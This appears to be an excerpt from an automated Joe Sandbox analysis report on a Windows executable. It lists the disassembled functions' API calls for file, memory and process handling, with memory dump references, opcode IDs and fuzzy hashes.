                                                                                  • Instruction Fuzzy Hash: F9A1A470A00B449FDB31DB78C8447ABBBE5AF45304F14496FE0A6E72E1C779A881CB59
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,?,?,-00000011,?,00408697,?,-00000011,?), ref: 004088C5
                                                                                  • CreateFileW.KERNEL32(?,000000FF,?,00000000,00000002,00000000,00000000,?,?,00000800,?,?,?,-00000011,?,00408697), ref: 004088FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: a4ede3637f81c6399fe517e098df117480547d4bd77c9e53a4a01029ce24adf2
                                                                                  • Instruction ID: 784a8f5131ab6fe8d16b89489c66080721abb018ebdeb7173a8cdc1c7e52f572
                                                                                  • Opcode Fuzzy Hash: a4ede3637f81c6399fe517e098df117480547d4bd77c9e53a4a01029ce24adf2
                                                                                  • Instruction Fuzzy Hash: 4C210672000709AFDB20AF248D41EEA7BB9EB04324F40C53EF5D5972D1CA79DD859B58
                                                                                  APIs
                                                                                  • FlushFileBuffers.KERNEL32(?), ref: 00408C6F
                                                                                  • SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 00408D16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlushTime
                                                                                  • String ID:
                                                                                  • API String ID: 1392018926-0
                                                                                  • Opcode ID: 77b2b841dbfb1dd3bf3fae68253bd11748802c7ac217e7d98abe305092b574c6
                                                                                  • Instruction ID: 9934343912befec5579582a579c8f78507b0e2abfc909207551953b2bb2c960f
                                                                                  • Opcode Fuzzy Hash: 77b2b841dbfb1dd3bf3fae68253bd11748802c7ac217e7d98abe305092b574c6
                                                                                  • Instruction Fuzzy Hash: FA21D531A05148AFEB15CF68CA45FEE7BB49F11314F18802EE895EB2C0DB38DA45C768
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00401318
                                                                                    • Part of subcall function 00402C8F: __EH_prolog.LIBCMT ref: 00402C94
                                                                                  • _wcslen.LIBCMT ref: 004013BA
                                                                                    • Part of subcall function 0041A27A: __lock.LIBCMT ref: 0041A298
                                                                                    • Part of subcall function 0041A27A: ___sbh_find_block.LIBCMT ref: 0041A2A3
                                                                                    • Part of subcall function 0041A27A: ___sbh_free_block.LIBCMT ref: 0041A2B2
                                                                                    • Part of subcall function 0041A27A: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041ED34,00000000,0042D8B8,0000000C,0041ED6E,00000000,0041A71B,?,004251F8,00000004,0042DAA0,0000000C), ref: 0041A2E2
                                                                                    • Part of subcall function 0041A27A: GetLastError.KERNEL32(?,004251F8,00000004,0042DAA0,0000000C,004210EE,00000000,0041A72A,00000000,00000000,00000000,?,0041E716,00000001,00000214), ref: 0041A2F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2367413355-0
                                                                                  • Opcode ID: 9b806b1359a32eee616e084e0610277f25a75823928bb00d0b22addce5a9ba26
                                                                                  • Instruction ID: 3a55d338a65da8f96d8438de8baa1fb22c516d62b219eb91f85df80b6fbcccb4
                                                                                  • Opcode Fuzzy Hash: 9b806b1359a32eee616e084e0610277f25a75823928bb00d0b22addce5a9ba26
                                                                                  • Instruction Fuzzy Hash: F121A131800205EBDF11AF95E801AEEBBB9EF08704F10417FF815B26A1C73D0A91DB89
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040E60D
                                                                                    • Part of subcall function 0040184A: __EH_prolog.LIBCMT ref: 0040184F
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 00401992
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 004019A1
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 004019B0
                                                                                    • Part of subcall function 00401790: __EH_prolog.LIBCMT ref: 00401795
                                                                                  • _malloc.LIBCMT ref: 0040E675
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memset$AllocateHeap_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 47157355-0
                                                                                  • Opcode ID: f20aaa6ceb426e52629ba7c54288e2a34bf7f33bf22dafb0c778fbdc05834582
                                                                                  • Instruction ID: 12e2d36743818a4afdaa2ebb84b17aaebdecbea8ad3659f9ce02ebd1e3ff5b4a
                                                                                  • Opcode Fuzzy Hash: f20aaa6ceb426e52629ba7c54288e2a34bf7f33bf22dafb0c778fbdc05834582
                                                                                  • Instruction Fuzzy Hash: 5D216D72900218DFCF05DF95D8819EEBBB8BF18308F40496FE006B3291EA395A55CB69
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408B01
                                                                                  • GetLastError.KERNEL32(?,?), ref: 00408B0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: bc5cc84f90a44e3402344609fbe591a0f94b3c4423ccc248817a00e96404d68b
                                                                                  • Instruction ID: 1a2c250e95b9ae838a8f6684677bec29d6ee1f68e8b1ee2c42085224d69d667d
                                                                                  • Opcode Fuzzy Hash: bc5cc84f90a44e3402344609fbe591a0f94b3c4423ccc248817a00e96404d68b
                                                                                  • Instruction Fuzzy Hash: 5801F5B2B02604BFD720A7788E428AB76ADCB84334714433FB552E33C1DA79AD009279
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,?,00000001,00000001,?,?,?,?,00408EF1,00000001,00000001,00000000,?,00407CEE,?,?), ref: 00408EBE
                                                                                  • GetLastError.KERNEL32(00408EF1,00000001,00000001,00000000,?,00407CEE,?,?,?,?,?,?,?,?,00000000,?), ref: 00408ECA
                                                                                    • Part of subcall function 00408D23: __EH_prolog.LIBCMT ref: 00408D28
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileH_prologLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 4236474358-0
                                                                                  • Opcode ID: 4f1fe507e24abfc9ff72860ed08c9b0e893e9299333d02d570664177b79ae1b2
                                                                                  • Instruction ID: 192c80b46441ab47ceee562e6a2b488ff6d5d822f5f6ee3dcc3f87b66fb43dad
                                                                                  • Opcode Fuzzy Hash: 4f1fe507e24abfc9ff72860ed08c9b0e893e9299333d02d570664177b79ae1b2
                                                                                  • Instruction Fuzzy Hash: 7F019231100318EBCB249F14CE0869B77A5FF50725F144A3EF8A1E22E0DB79E955DA99
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0041A624
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • __CxxThrowException@8.LIBCMT ref: 0041A669
                                                                                    • Part of subcall function 00411EDB: std::exception::exception.LIBCMT ref: 00411EE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateException@8HeapThrow_mallocstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1264268182-0
                                                                                  • Opcode ID: 3478f9e89b29c03405a6adbc8e8381d4b5206ec0b1a49669d22f402693bedd24
                                                                                  • Instruction ID: 3cceb8025a7d4aeead261000b78fa94cc5fb3de44e4d38a2e590eddc4ad324aa
                                                                                  • Opcode Fuzzy Hash: 3478f9e89b29c03405a6adbc8e8381d4b5206ec0b1a49669d22f402693bedd24
                                                                                  • Instruction Fuzzy Hash: 8FF0E23064021962CF047762EC0AACE3B986F42798B18443BEC54920A2DBADAAD5859E
                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNELBASE(00000000,00000000,74DF3110,00000001,?,0040925D,00000000,?,?,0040933E,?,00000001,00000000,?,?), ref: 00408FC8
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,00000000,?,00000800,?,0040925D,00000000,?,?,0040933E,?,00000001,00000000,?,?), ref: 00408FF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 0d9f3cd0aba901f52d22e7fc9097910621589f24df853318d5af2ba87b6fa5e9
                                                                                  • Instruction ID: f32d49dd2ae8b58c0c40083fb3defa4b541d68cc1025cec9ed250b126f692f27
                                                                                  • Opcode Fuzzy Hash: 0d9f3cd0aba901f52d22e7fc9097910621589f24df853318d5af2ba87b6fa5e9
                                                                                  • Instruction Fuzzy Hash: 4FF0A73114123E66DF016A658C01FDE3B6DAF043D4F048027BC84A7191DB75DDA59AA4
                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(?,?,-00000011,?,0040869F,?,?,00000001,?,?,?,?,?,?,00000000,?), ref: 0040901C
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,0040869F,?,?,00000001,?,?,?,?,?,?,00000000), ref: 00409046
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: 90451938786b7f59172b0c811631159dade1dd164b308dfaaa0a80e1040f6e92
                                                                                  • Instruction ID: a13a883a1f6153248d7ef179cdd29017bd0aa464b96f45660c3251f7b49a4acf
                                                                                  • Opcode Fuzzy Hash: 90451938786b7f59172b0c811631159dade1dd164b308dfaaa0a80e1040f6e92
                                                                                  • Instruction Fuzzy Hash: CCE02B3114222DA6DB1066218C01FDE3B6C5F043C0F0440737C84A31D1DB79EC9189A5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText_swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3011073432-0
                                                                                  • Opcode ID: f462540bee88420ba8de915a207eadb7e78809dfaab5b3a47c540e35977eae7d
                                                                                  • Instruction ID: 51d718bbcdad2d3c0e38940bd9655f966f128ec5ed9968088acb2aee9960783c
                                                                                  • Opcode Fuzzy Hash: f462540bee88420ba8de915a207eadb7e78809dfaab5b3a47c540e35977eae7d
                                                                                  • Instruction Fuzzy Hash: 0AF05C31A1030876EB01B7B18D43F8E366C4705789F04057AB700730E1D5795931875E
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,004091CE,?,00406720,?,?,?,?), ref: 00408F79
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,004091CE,?,00406720,?,?,?,?), ref: 00408FA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: d44052b13896b8b2efb6b8bfc698ce1e12285283b25508e3535b24f355f29611
                                                                                  • Instruction ID: 92e1726b443e00eb3ee6414bf043f798e9f7245f272599e856072e2678fdb8df
                                                                                  • Opcode Fuzzy Hash: d44052b13896b8b2efb6b8bfc698ce1e12285283b25508e3535b24f355f29611
                                                                                  • Instruction Fuzzy Hash: A0E09B7260011C26DB10A769CC01FDD77ADAB8C3B5F044077B944E31D0DAB8DD968BA4
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,00410CE3,00409F14), ref: 00410CB4
                                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 00410CBB
                                                                                  Similarity
                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                  • String ID:
                                                                                  • API String ID: 1231390398-0
                                                                                  • Opcode ID: dcf7491ca214860e487e77938373b098f05fcf341780650e92e05a1f8534bf3b
                                                                                  • Instruction ID: e5f39edb2d65f6a1d41532f442d8ed9e2f6a737e4aba591fa598ebba9ce63b28
                                                                                  • Opcode Fuzzy Hash: dcf7491ca214860e487e77938373b098f05fcf341780650e92e05a1f8534bf3b
                                                                                  • Instruction Fuzzy Hash: 8AE08076610106AB8F1C57B4CD055EF725CE701305710457BE403D1200F5A4D5C15BE9
                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,00438820,0040FE7C), ref: 00419E40
                                                                                  • FreeLibrary.KERNELBASE(?,00000000,00438820,0040FE7C), ref: 00419E4A
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 0d62cf78e3bdc661a2f82cba813f0a1a4c9abef6bee34bc7d64aa9ac4bab2991
                                                                                  • Instruction ID: e9e9cc9e75335fbaa328bc5dbfdccc89299fc13d4448708a46788c35bb3e456b
                                                                                  • Opcode Fuzzy Hash: 0d62cf78e3bdc661a2f82cba813f0a1a4c9abef6bee34bc7d64aa9ac4bab2991
                                                                                  • Instruction Fuzzy Hash: 14E0E635701210DB8621EF69DC04997F3ECAF85711315446AE804D3350C774EC418AA9
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: ItemShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3351165006-0
                                                                                  • Opcode ID: 4831fce4d73d936a96b8da5e650052ed61dc757b3f02978e41a04ced16bb9e28
                                                                                  • Instruction ID: bb8df4f73c5df098251a309fe1c33c8504d4bfd4afe98da2c54c19901aad4cc9
                                                                                  • Opcode Fuzzy Hash: 4831fce4d73d936a96b8da5e650052ed61dc757b3f02978e41a04ced16bb9e28
                                                                                  • Instruction Fuzzy Hash: 9FC01232258201FFCB010BB0DC09D2ABFACABA4212F00CA68B8A5C0161C23AC020DB62
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 004060B1
                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 004060B8
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherItemUser
                                                                                  • String ID:
                                                                                  • API String ID: 4250310104-0
                                                                                  • Opcode ID: 10473aa6b390d4c6f4367ea588a870e2b335c57c20f02c17b48037ae3329eebf
                                                                                  • Instruction ID: 1aa957cd52260ed364119c24255e18d6411bf3cbccacf3a019d43f62ef9d5eea
                                                                                  • Opcode Fuzzy Hash: 10473aa6b390d4c6f4367ea588a870e2b335c57c20f02c17b48037ae3329eebf
                                                                                  • Instruction Fuzzy Hash: 4BC04C76508240FFCB115BA09D08C2FBFADAF98311F50C859B9A581121C636C421DB26
                                                                                  APIs
                                                                                  • ___crtCorExitProcess.LIBCMT ref: 004212A1
                                                                                    • Part of subcall function 0042126E: GetModuleHandleW.KERNEL32(mscoree.dll,?,004212A6,00000000,?,0041CD27,000000FF,0000001E,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018), ref: 00421278
                                                                                    • Part of subcall function 0042126E: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00421288
                                                                                  • ExitProcess.KERNEL32 ref: 004212AA
                                                                                  Similarity
                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                  • String ID:
                                                                                  • API String ID: 2427264223-0
                                                                                  • Opcode ID: 21a27a63abf6c3875c02e94f35324880841d9b00b93dc530bda6b4d16cfe0508
                                                                                  • Instruction ID: c6812d1777e32e585e2ef8636d69d3407a4dd70a4b54595152d0a3a8b2406f89
                                                                                  • Opcode Fuzzy Hash: 21a27a63abf6c3875c02e94f35324880841d9b00b93dc530bda6b4d16cfe0508
                                                                                  • Instruction Fuzzy Hash: 5EB09231204148BFDB112F12EC0A85D3F2AEB807A0BA04025FC084A072DF72EDA2DAD9
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 2421c4f90e7814d60c036d7d1e238915adf895873ea2564b94cd26f126ff620e
                                                                                  • Instruction ID: 742206060651fc025572fd1eb548bf5572dfcfe9c4a596cdf26dc89aeb9e180e
                                                                                  • Opcode Fuzzy Hash: 2421c4f90e7814d60c036d7d1e238915adf895873ea2564b94cd26f126ff620e
                                                                                  • Instruction Fuzzy Hash: C8612570505744ABDB34DB79C989BEBB7E4AF41304F00496FF5AB622C2CBB82944CB19
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 79c241710036945b0e8c1d7d32c4cb15439dc8290ce9352ac8db3af8127058bf
                                                                                  • Instruction ID: be647cb3fd71d12650130d9a698408558a82919b25c6e51b47c3e11cfe21f77e
                                                                                  • Opcode Fuzzy Hash: 79c241710036945b0e8c1d7d32c4cb15439dc8290ce9352ac8db3af8127058bf
                                                                                  • Instruction Fuzzy Hash: BA31B6B2A141058BDB14DF59C9826EDB7F1EF95308B10442FD096E7342D73E9D85CB68
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _wcsncpy
                                                                                  • String ID:
                                                                                  • API String ID: 1735881322-0
                                                                                  • Opcode ID: 22205a8470e74219309dd66db67576da41e8cb33cbd043dad4ed0d8e077d1d56
                                                                                  • Instruction ID: e5a65c93cd06a23b3edbbe9bd77c12815be82857be03b7caa808787e9d51beb7
                                                                                  • Opcode Fuzzy Hash: 22205a8470e74219309dd66db67576da41e8cb33cbd043dad4ed0d8e077d1d56
                                                                                  • Instruction Fuzzy Hash: 9B21F9315012156ADF309AA5C886BDE73A99F4A744F104077FD84F71C2E6BCADC58B58
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 81fb3a6f0b2dadf3925ad1a8b3a294dd36e0657d826e3ecd61b285badfde8637
                                                                                  • Instruction ID: 3b0f654ca84f9b00b74004c7f9d6528193aeb6f532f40180d9f0fe85922b7209
                                                                                  • Opcode Fuzzy Hash: 81fb3a6f0b2dadf3925ad1a8b3a294dd36e0657d826e3ecd61b285badfde8637
                                                                                  • Instruction Fuzzy Hash: 01F04F35B002149FD7149F58CC89FADF7B5FF48724F208199E912A73D1CB799D018A54
                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNELBASE(?,74DF20B0,00000000,004085AD,?,?,?,?,0040736D,?,00000000,?,00000800,?,?,?), ref: 0040896D
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  • Opcode ID: fa28e57e717c14776fcc15f50cb58b478873ae3328fd3a4ffbe1696e0b816d3d
                                                                                  • Instruction ID: e341fdcc8387c91c0e5d0cb21e7631946c13a32fabfeae03377b8c24d8ce50d2
                                                                                  • Opcode Fuzzy Hash: fa28e57e717c14776fcc15f50cb58b478873ae3328fd3a4ffbe1696e0b816d3d
                                                                                  • Instruction Fuzzy Hash: 14F027B0542B144FD730663956487E373D85B15735F08972FE9E2A33C1C77C5C484A56
APIs
• __EH_prolog.LIBCMT ref: 0040550F
  • Part of subcall function 00409F46: __EH_prolog.LIBCMT ref: 00409F4B
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
